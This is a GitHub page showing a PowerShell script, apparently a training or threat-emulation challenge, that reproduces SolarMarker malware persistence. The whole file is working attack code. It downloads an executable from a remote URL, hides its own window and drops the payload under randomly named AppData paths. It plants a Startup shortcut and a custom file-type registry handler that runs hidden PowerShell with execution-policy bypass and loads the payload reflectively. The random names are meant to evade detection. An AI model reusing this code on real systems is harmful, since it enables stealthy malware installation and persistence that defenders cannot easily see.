-
Notifications
You must be signed in to change notification settings - Fork 1
/
Persistence_001.ps1
73 lines (59 loc) · 3.31 KB
/
Persistence_001.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# Create persistence in the registry via randomized keys
# Create persistence via startup programs
# Used in SolarMarker sample 5a2
<#
The payload must be a Base64 String. This can be accomplished with any remote or local file by converting the bytes as shown below.
#>
# This payload is harmless, but may flag defender/other AV or EDR
$Payload = [System.Convert]::ToBase64String((Invoke-WebRequest -uri "https://github.com/lpowell/CFSOInformerChallenges/raw/main/PARROT.exe").Content)
# Hide the window the commands are executing in
$ShowWindowA = Add-type -MemberDefinition ('[DllImport("user32.dll")]public static extern bool ShowWindowAsync(IntPtr hwnd, int ncmdshow);') -Name ('Win32ShowWindowASync') -Namespace Win32Functions -PassThru
# nCmdShow = 0 sets the window to hidden
$ShowWindowA::ShowWindowAsync((Get-Process -id $pid).MainWindowHandle, 0)
# Return a randomized string of 10-20 characters determined by ASCII code
function GenerateRandomCharArray {
return -join ((65..90)+(97..122)|Get-Random -count (Get-Random -minimum 10 -maximum 20)| %{[Char]$_})
}
<# Create registry entries with random names to evade IOC based detections #>
# HKCU\SOFTWARE\Classes\***\Shell\Open\Command will launch a command when the *** filetype is launched
function EditRegistry{
param($RegistryKey, $RegistryValue)
if (-Not (Test-Path "registry::$RegistryKey")) {
New-Item -path "registry::$RegistryKey" -ItemType registrykey -Force
}
Set-Item -Path "registry::$RegistryKey" -value $RegistryValue
}
# Create a random name for use with registry edits
$CharArrayOne = (GenerateRandomCharArray)
# Create a random name to use with startup
$CharArrayTwo = (GenerateRandomCharArray)
<# Create a startup shortcut #>
$WScriptShell = New-Object -ComObject Wscript.Shell
# Get AppData path (Adobe used in sample) and add a random subfolder
$AppDataPath = "$env:APPDATA\Adobe\"+(GenerateRandomCharArray)
# Create a path for the payload bytes
$PayloadPath = $AppDataPath+"\"+(GenerateRandomCharArray) + "." + $CharArrayOne
# Create the directory
New-Item -Force -ItemType Directory -Path $AppDataPath
# Create shortcut
$Shortcut = $WScriptShell.CreateShortCut($env:APPDATA+"\Microsoft\Windows\Start Menu\Programs\Startup\"+$CharArrayTwo+".lnk")
# Select target path
$Shortcut.TargetPath = $PayloadPath
# Set windowstyle
$Shortcut.WindowStyle = 7
# Save shortcut
$Shortcut.Save()
# Write Payload bytes to file
[System.IO.File]::WriteAllBytes($PayloadPath, [System.Convert]::FromBase64String($Payload))
<# Uncomment to get messagbox displays for debugging
Add-Type -AssemblyName PresentationCore,PresentationFramework
[System.Windows.MessageBox]::Show("HKEY_Current_User\Software\Classes\"+$CharArrayOne,"Registry Key")
[System.Windows.MessageBox]::Show("$PayloadPath","PayloadPath")
[System.Windows.MessageBox]::Show($env:APPDATA+"\Microsoft\Windows\StartMenu\Programs\Startup\"+$CharArrayTwo+".lnk", "Startup")
#>
# Create an expression to execute
$Expression = "[System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes('"+$PayloadPath+"')).EntryPoint.Invoke(`$null, (, [string[]](`"`")))"
# Add the expression to the registry
EditRegistry -RegistryKey ("HKEY_Current_User\Software\Classes\."+$CharArrayOne+"\Shell\OPEN\Command") -RegistryValue ("powershell -windowstyle hidden -ep bypass -command " + $Expression)
# Run the expression
iex $Expression